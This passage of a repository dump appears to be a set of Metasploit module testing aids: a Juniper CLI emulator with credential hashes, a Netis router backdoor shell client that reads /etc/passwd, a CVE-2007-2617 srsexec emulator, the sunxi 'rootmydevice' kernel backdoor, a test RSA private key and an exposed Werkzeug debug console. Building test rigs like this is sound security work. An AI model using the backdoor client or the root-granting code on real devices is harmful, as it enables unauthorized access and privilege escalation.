0kbps 53 | total allocated gbw 0kbps 54 | Interface ethernet0/1: 55 | description ethernet0/1 56 | number 5, if_info 440, if_index 0, mode nat 57 | link down, phy-link down, admin status up 58 | status change:0 59 | vsys Root, zone DMZ, vr trust-vr 60 | dhcp client disabled 61 | PPPoE disabled 62 | admin mtu 0, operating mtu 1500, default mtu 1500 63 | *ip 0.0.0.0/0 mac 0000.0000.a302 64 | *manage ip 0.0.0.0, mac 0000.0000.a302 65 | bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps] 66 | configured ingress mbw 0kbps, current bw 0kbps 67 | total allocated gbw 0kbps 68 | Interface ethernet0/2: 69 | description ethernet0/2 70 | number 6, if_info 528, if_index 0 71 | link down, phy-link down 72 | status change:0 73 | member of bgroup0 74 | vsys Root, zone Null, vr untrust-vr 75 | *ip 0.0.0.0/0 mac 0000.0000.a303 76 | Interface ethernet0/3: 77 | description ethernet0/3 78 | number 7, if_info 616, if_index 0 79 | link up, phy-link up/full-duplex 80 | status change:1, last change:03/28/2016 19:24:34 81 | member of bgroup0 82 | vsys Root, zone Null, vr untrust-vr 83 | *ip 0.0.0.0/0 mac 0000.0000.a304 84 | Interface ethernet0/4: 85 | description ethernet0/4 86 | number 8, if_info 704, if_index 0 87 | link down, phy-link down 88 | status change:0 89 | member of bgroup0 90 | vsys Root, zone Null, vr untrust-vr 91 | *ip 0.0.0.0/0 mac 0000.0000.a305 92 | Interface ethernet0/5: 93 | description ethernet0/5 94 | number 9, if_info 792, if_index 0 95 | link down, phy-link down 96 | status change:0 97 | member of bgroup0 98 | vsys Root, zone Null, vr untrust-vr 99 | *ip 0.0.0.0/0 mac 0000.0000.a306 100 | Interface ethernet0/6: 101 | description ethernet0/6 102 | number 10, if_info 880, if_index 0 103 | link down, phy-link down 104 | status change:0 105 | member of bgroup0 106 | vsys Root, zone Null, vr untrust-vr 107 | *ip 0.0.0.0/0 mac 0000.0000.a307 108 | Interface bgroup0: 109 | description bgroup0 110 | number 11, if_info 968, if_index 0, mode nat 111 | link up, phy-link up/full-duplex, admin status up 112 | status change:1, last change:03/28/2016 19:24:34 113 | vsys Root, zone Trust, vr trust-vr 114 | dhcp client disabled 115 | PPPoE disabled 116 | admin mtu 0, operating mtu 1500, default mtu 1500 117 | *ip 192.168.1.1/24 mac 0000.0000.a308 118 | *manage ip 192.168.1.1, mac 0000.0000.a308 119 | route-deny disable 120 | bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps] 121 | configured ingress mbw 0kbps, current bw 0kbps 122 | total allocated gbw 0kbps 123 | Interface bgroup1: 124 | description bgroup1 125 | number 12, if_info 1056, if_index 0 126 | link down, phy-link down, admin status up 127 | status change:0 128 | vsys Root, zone Null, vr untrust-vr 129 | admin mtu 0, operating mtu 1500, default mtu 1500 130 | *ip 0.0.0.0/0 mac 0000.0000.a309 131 | bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps] 132 | configured ingress mbw 0kbps, current bw 0kbps 133 | total allocated gbw 0kbps 134 | Interface bgroup2: 135 | description bgroup2 136 | number 13, if_info 1144, if_index 0 137 | link down, phy-link down, admin status up 138 | status change:0 139 | vsys Root, zone Null, vr untrust-vr 140 | admin mtu 0, operating mtu 1500, default mtu 1500 141 | *ip 0.0.0.0/0 mac 0000.0000.a30a 142 | bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps] 143 | configured ingress mbw 0kbps, current bw 0kbps 144 | total allocated gbw 0kbps 145 | Interface bgroup3: 146 | description bgroup3 147 | number 14, if_info 1232, if_index 0 148 | link down, phy-link down, admin status up 149 | status change:0 150 | vsys Root, zone Null, vr untrust-vr 151 | admin mtu 0, operating mtu 1500, default mtu 1500 152 | *ip 0.0.0.0/0 mac 0000.0000.a30b 153 | bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps] 154 | configured ingress mbw 0kbps, current bw 0kbps 155 | total allocated gbw 0kbps 156 | """, 157 | "?": """clear clear dynamic system info 158 | delete delete persistent info in flash 159 | exec exec system commands 160 | exit exit command console 161 | get get system information 162 | mtrace multicast traceroute from source to destination 163 | ping ping other host 164 | reset reset system 165 | save save command 166 | set configure system parameters 167 | telnet Telnet other hostname 168 | trace-route trace route 169 | unset unconfigure system parameters 170 | """, 171 | "GET CONFIG":"""Total Config size 3679: 172 | unset key protection enable 173 | set clock timezone 0 174 | set vrouter trust-vr sharable 175 | set vrouter "untrust-vr" 176 | exit 177 | set vrouter "trust-vr" 178 | unset auto-route-export 179 | exit 180 | set alg appleichat enable 181 | unset alg appleichat re-assembly enable 182 | set alg sctp enable 183 | set auth-server "Local" id 0 184 | set auth-server "Local" server-name "Local" 185 | set auth default auth server "Local" 186 | set auth radius accounting port 1646 187 | set admin name "netscreen" 188 | set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn" 189 | set admin auth web timeout 10 190 | set admin auth dial-in timeout 3 191 | set admin auth server "Local" 192 | set admin format dos 193 | set zone "Trust" vrouter "trust-vr" 194 | set zone "Untrust" vrouter "trust-vr" 195 | set zone "DMZ" vrouter "trust-vr" 196 | set zone "VLAN" vrouter "trust-vr" 197 | set zone "Untrust-Tun" vrouter "trust-vr" 198 | set zone "Trust" tcp-rst 199 | set zone "Untrust" block 200 | unset zone "Untrust" tcp-rst 201 | set zone "MGT" block 202 | unset zone "V1-Trust" tcp-rst 203 | unset zone "V1-Untrust" tcp-rst 204 | set zone "DMZ" tcp-rst 205 | unset zone "V1-DMZ" tcp-rst 206 | unset zone "VLAN" tcp-rst 207 | set zone "Untrust" screen tear-drop 208 | set zone "Untrust" screen syn-flood 209 | set zone "Untrust" screen ping-death 210 | set zone "Untrust" screen ip-filter-src 211 | set zone "Untrust" screen land 212 | set zone "V1-Untrust" screen tear-drop 213 | set zone "V1-Untrust" screen syn-flood 214 | set zone "V1-Untrust" screen ping-death 215 | set zone "V1-Untrust" screen ip-filter-src 216 | set zone "V1-Untrust" screen land 217 | set interface "ethernet0/0" zone "Untrust" 218 | set interface "ethernet0/1" zone "DMZ" 219 | set interface "bgroup0" zone "Trust" 220 | set interface bgroup0 port ethernet0/2 221 | set interface bgroup0 port ethernet0/3 222 | set interface bgroup0 port ethernet0/4 223 | set interface bgroup0 port ethernet0/5 224 | set interface bgroup0 port ethernet0/6 225 | unset interface vlan1 ip 226 | set interface bgroup0 ip 192.168.1.1/24 227 | set interface bgroup0 nat 228 | unset interface vlan1 bypass-others-ipsec 229 | unset interface vlan1 bypass-non-ip 230 | set interface bgroup0 ip manageable 231 | set interface ethernet0/0 dhcp client enable 232 | set interface ethernet0/0 dhcp client settings autoconfig 233 | set interface "serial0/0" modem settings "USR" init "AT&F" 234 | set interface "serial0/0" modem settings "USR" active 235 | set interface "serial0/0" modem speed 115200 236 | set interface "serial0/0" modem retry 3 237 | set interface "serial0/0" modem interval 10 238 | set interface "serial0/0" modem idle-time 10 239 | set ip tftp retry 30 240 | set ip tftp timeout 30 241 | set flow tcp-mss 242 | unset flow no-tcp-seq-check 243 | set flow tcp-syn-check 244 | unset flow tcp-syn-bit-check 245 | set flow reverse-route clear-text prefer 246 | set flow reverse-route tunnel always 247 | set pki authority default scep mode "auto" 248 | set pki x509 default cert-path partial 249 | set user "testuser" uid 1 250 | set user "testuser" type auth 251 | set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=" 252 | set user "testuser" enable 253 | set crypto-policy 254 | exit 255 | set ike respond-bad-spi 1 256 | set ike ikev2 ike-sa-soft-lifetime 60 257 | unset ike ikeid-enumeration 258 | unset ike dos-protection 259 | unset ipsec access-session enable 260 | set ipsec access-session maximum 5000 261 | set ipsec access-session upper-threshold 0 262 | set ipsec access-session lower-threshold 0 263 | set ipsec access-session dead-p2-sa-timeout 0 264 | unset ipsec access-session log-error 265 | unset ipsec access-session info-exch-connected 266 | unset ipsec access-session use-error-log 267 | set url protocol websense 268 | exit 269 | set policy id 1 from "Trust" to "Untrust" "Any" "Any" "ANY" permit 270 | set policy id 1 271 | exit 272 | set nsmgmt bulkcli reboot-timeout 60 273 | set ssh version v2 274 | set config lock timeout 5 275 | unset license-key auto-update 276 | set telnet client enable 277 | set snmp port listen 161 278 | set snmp port trap 162 279 | set snmpv3 local-engine id "0162122013002408" 280 | set vrouter "untrust-vr" 281 | exit 282 | set vrouter "trust-vr" 283 | unset add-default-route 284 | exit 285 | set vrouter "untrust-vr" 286 | exit 287 | set vrouter "trust-vr" 288 | exit 289 | """, 290 | "PROMPT": "ssg5-serial-> " 291 | } -------------------------------------------------------------------------------- /netcore/README.md: -------------------------------------------------------------------------------- 1 | For help in debugging https://github.com/rapid7/metasploit-framework/pull/6880 2 | -------------------------------------------------------------------------------- /netcore/netcore_module_check_then_run_sanitized_160525-210525_clean.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_check_then_run_sanitized_160525-210525_clean.pcap -------------------------------------------------------------------------------- /netcore/netcore_module_run_big_endian_sanitized_160525-210552.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_run_big_endian_sanitized_160525-210552.pcap -------------------------------------------------------------------------------- /netcore/netcore_module_run_sanitized_160525-210507.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_run_sanitized_160525-210507.pcap -------------------------------------------------------------------------------- /netcore/netcore_python_sanitized_160525-210510_clean.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_python_sanitized_160525-210510_clean.pcap -------------------------------------------------------------------------------- /netis_backdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import argparse 3 | import binascii 4 | ''' 5 | Example run: 6 | root@rageKali:/media/veracrypt1/stcyr/git/MSF-Testing-Scripts# python netis_backdoor.py 192.168.1.1 7 | Unlocking Backdoor 8 | Quit to quit loop 9 | Netis> ls /tmp/ 10 | AuCVM 11 | XqdHc 12 | bVOQm 13 | br_type 14 | bridge_init 15 | cfg-macclone 16 | checkupfile 17 | ddfile 18 | default_rt 19 | dhcpd_action 20 | file.txt 21 | hzbjo 22 | igd_config.old 23 | jiDOo 24 | log 25 | ntp_tmp 26 | passwd 27 | reg_domain 28 | syslogd_support 29 | tmp.txt 30 | update_main 31 | version 32 | wan_type 33 | workmode 34 | 35 | Netis> cat /etc/passwd 36 | root:abSQTPcIskFGc:0:0:root:/:/bin/sh 37 | nobody:x:99:99:Nobody:/: 38 | 39 | ''' 40 | parser = argparse.ArgumentParser(description='Netis backdoor') 41 | parser.add_argument('IP', help='IP of router to connect to') 42 | 43 | args = parser.parse_args() 44 | 45 | def send(command, print_response = True): 46 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 47 | #s.connect((args.IP, 53413)) 48 | s.sendto("AA\x00\x00AAAA%s\x00" %(command), (args.IP, 53413)) 49 | if print_response: 50 | resp = s.recv(2048) 51 | resp = resp[8:] 52 | if binascii.hexlify(resp) == "000000ff": 53 | print("No response, command not found or error in command") 54 | else: 55 | print(resp) 56 | 57 | def login(): 58 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 59 | #s.connect((args.IP, 53413)) 60 | s.sendto("AAAAAAAAnetcore\x00", (args.IP, 53413)) 61 | 62 | print("Unlocking Backdoor") 63 | login() 64 | input = "" 65 | print("Quit to quit loop") 66 | input = raw_input("Netis> ").strip() 67 | while not input.strip().upper() in ["QUIT","EXIT"]: 68 | send(" " + input) 69 | input = raw_input("Netis> ").strip() 70 | 71 | -------------------------------------------------------------------------------- /op5-monitor-7.1.9-20160303.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/op5-monitor-7.1.9-20160303.tar.gz -------------------------------------------------------------------------------- /srsexec: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | ''' 4 | Install Instructions: 5 | 6 | This should be run out of the /opt/SUNWsrspx/bin/ folder 7 | 8 | You'll want to set this file's permissions as such: 9 | chown root:sys /opt/SUNWsrspx/bin/srsexec 10 | chmod 555 srsexec 11 | chmod u+s srsexec 12 | 13 | Solaris 10u9 doesn't have argparse, you needto transfer it manually (from pypi.org) and install it to /usr/lib/python2.4/site-packages/ 14 | ''' 15 | 16 | # See https://www.securityfocus.com/archive/1/468235 17 | 18 | import argparse 19 | import sys 20 | import os 21 | import stat 22 | 23 | parser = argparse.ArgumentParser(description='This is a CVE-2007-2617 srsexec emulator') 24 | parser.add_argument('-dvb', nargs=1, type=argparse.FileType('r'), default=sys.stdin, help='File to read in') 25 | parser.add_argument('foobar', nargs=1, help='String, unsure what its purpose is') 26 | 27 | args = parser.parse_args() 28 | 29 | # Create the uninstall files... while this isn't in the real binary, it'll make sure it seems installed correctly for 30 | # our exploitation purposes. See download.oracle.com/sunalerts/1000443.1.html 31 | EMULATED_VERSION = '003.002.004' #'003.002.003' is also vuln, '003.002.005' is not. 32 | # sol10u9 has py 2.4 installed, so no with statement 33 | try: 34 | f = open('/opt/SUNWsrspx/bin/UninstallNetConnect.%s.sh' %(EMULATED_VERSION), 'a') 35 | f.close() 36 | except IOError: 37 | pass #fail silent 38 | 39 | firstline = args.dvb[0].readline() 40 | if firstline.endswith('\n'): 41 | firstline = firstline[:-1] 42 | args.foobar = args.foobar[0] 43 | 44 | print('''verify_binary(%s) 45 | srsexec: binary_name: %s''' %(args.foobar, args.foobar)) 46 | print('srsexec: name_buf: %s' %((args.foobar + '_'*20)[0:20] )) #this line is 20 characters long with the foobar string in the beginning and ending with underscores 47 | i=0 48 | while i<=len(firstline): 49 | print('binaries file line: %s' %(firstline[i:i+20])) 50 | i+=18 # looks like we have a 2 character repeat on the next line kind of thing 51 | 52 | print('smmsp:NP') 53 | print('Security verification failed for binary: %s' %(args.foobar)) 54 | print('see SYSLOG(/var/adm/messages) for errors') 55 | -------------------------------------------------------------------------------- /sunxi-debug.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Sunxi_debug.c 3 | * 4 | * 5 | * This program is free software; you can redistribute it and/or modify 6 | * it under the terms of the GNU General Public License version 2 as 7 | * published by the Free Software Foundation. 8 | */ 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #include 15 | #include //add by fe3o4 16 | #include 17 | #include 18 | 19 | static struct proc_dir_entry *proc_root; 20 | static struct proc_dir_entry * proc_su; 21 | 22 | 23 | static int sunxi_proc_su_write(struct file *file, const char __user *buffer, 24 | unsigned long count, void *data) 25 | { 26 | char *buf; 27 | struct cred *cred; 28 | 29 | if (count < 1) 30 | return -EINVAL; 31 | 32 | buf = kmalloc(count, GFP_KERNEL); 33 | if (!buf) 34 | return -ENOMEM; 35 | 36 | if (copy_from_user(buf, buffer, count)) { 37 | kfree(buf); 38 | return -EFAULT; 39 | } 40 | 41 | if(!strncmp("rootmydevice",(char*)buf,12)){ 42 | cred = (struct cred *)__task_cred(current); 43 | cred->uid = 0; 44 | cred->gid = 0; 45 | cred->suid = 0; 46 | cred->euid = 0; 47 | cred->euid = 0; 48 | cred->egid = 0; 49 | cred->fsuid = 0; 50 | cred->fsgid = 0; 51 | printk("now you are root\n"); 52 | } 53 | 54 | kfree(buf); 55 | return count; 56 | } 57 | 58 | 59 | static int sunxi_proc_su_read(char *page, char **start, off_t off, 60 | int count, int *eof, void *data) 61 | { 62 | printk("sunxi debug: rootmydevice\n"); 63 | return 0; 64 | } 65 | 66 | static int sunxi_root_procfs_attach(void) 67 | { 68 | proc_root = proc_mkdir("sunxi_debug", NULL); 69 | proc_su= create_proc_entry("sunxi_debug", 0666, proc_root); 70 | if (IS_ERR(proc_su)){ 71 | printk("create sunxi_debug dir error\n"); 72 | return -1; 73 | } 74 | proc_su->data = NULL; 75 | proc_su->read_proc = sunxi_proc_su_read; 76 | proc_su->write_proc = sunxi_proc_su_write; 77 | return 0; 78 | 79 | } 80 | 81 | static int sunxi_debug_init(void) 82 | { 83 | int ret; 84 | ret = sunxi_root_procfs_attach(); 85 | printk("===fe3o4==== sunxi_root_procfs_attach ret:%d\n", ret); 86 | if(ret){ 87 | printk("===fe3o4== sunxi_root_procfs_attach failed===\n "); 88 | } 89 | return ret; 90 | } 91 | 92 | subsys_initcall(sunxi_debug_init); 93 | 94 | -------------------------------------------------------------------------------- /test_rsa.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz 3 | oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/ 4 | d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB 5 | gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0 6 | EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon 7 | soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H 8 | tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU 9 | avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA 10 | 4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g 11 | H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv 12 | qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV 13 | HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc 14 | nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /tiki-14.1.tar.gz: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:bcca2e72d89a5c11d32fad4e741c71c3b8d2c2bd4c29601d58c17864345037b2 3 | size 48436906 4 | -------------------------------------------------------------------------------- /werkzeug_console.py: -------------------------------------------------------------------------------- 1 | #from http://werkzeug.pocoo.org/ 2 | from werkzeug.wrappers import Request, Response 3 | 4 | @Request.application 5 | def application(request): 6 | return Response('Example Application. Please visit /console for the debugger') 7 | 8 | if __name__ == '__main__': 9 | from werkzeug.serving import run_simple 10 | run_simple('0.0.0.0', 8081, application, use_debugger=True) 11 | --------------------------------------------------------------------------------